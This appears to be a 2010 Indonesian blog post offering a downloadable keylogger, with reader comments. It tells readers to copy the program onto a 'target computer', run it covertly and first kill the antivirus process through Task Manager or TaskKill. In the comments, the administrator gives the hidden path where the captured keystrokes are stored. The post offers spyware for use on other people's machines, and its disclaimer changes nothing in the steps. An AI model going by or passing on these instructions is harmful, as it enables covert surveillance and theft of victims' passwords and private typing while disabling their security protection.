SPECIAL TO MR.X

| Rabu, 07 April 2010 | |
Ni bang, key logger yang mas pesan, asli hasil besutan Mas Poni
cara menggunakannya..tinggal download trus exstrak di Flash Disc
nanti akan ketemu 2 file bernama "saya.exe" dan "RAHASIA"

Selanjutnya copykan File "saya.exe" ke komputer target, lalu jalankan
program tersebut dengan didobel klik saja..

Selanjutnya untuk melihat hasil monitor, bisa buka lewat shortcutnya
yang saya beri judul "RAHASIA" tadi..
OK Bang, semoga berguna...segala resiko yang timbul atas penggunaan
program ini untuk maksud2 jahat adalah diluar tanggung jawab saya.


NB= Beberapa antivirus mengenali program ini sebagai virus, jadi sebelum
menjalankan program ini, usahakan untuk mematikan dulu proses antivirus
tersebut melalui Task Manager (Ctrl+Alt+Del) atau melalui TaskKill di
Comand Dos.
TQ....


Download Key Logger Sederhana

4 komentar:

Anonim Says:
7 April 2010 pukul 06.04

Thanks before ya mas...
tapi aku msh ragu gmn caranya kita lihat konfirmasi dari komputer yg udh kita masukin keyloggernya..
mohon bantuannya ya mas...
terima kasih...

Anonim Says:
7 April 2010 pukul 06.08

makasih ya mas..
tp aku msh bingung gmn caranya kt ngeliat file2 di dalam komputer yg mau kita lihat (konfirmasinya dmn?)
mas bilang kan lht di file "rahasia",tp knp ga ada ya mas..
mhn bantuannya ya mas...
thanks..

Administrator Says:
9 April 2010 pukul 02.00

Terimakasih juga mas sebelumnya..kalau mas kesulitan untuk membuka hasil monitoringnya, setelah file "saya.exe" dijalankan. mas bisa buka secara manual pada address di explorer ketikkan
"C:\RECYCLER\RAHASIA.txt"
maka anda akan langsung di redirect ke alamat penyimpanan key loggernya.Thank You.

Administrator Says:
9 April 2010 pukul 02.01

Kalau mau coment lagi mas bisa pakai Rubrik Tanya Jawab (NGOBROL) di side sebelah..jadi saya bisa langsung tau.TQ

Posting Komentar

Blogger Templates
Mau Beli Mobil?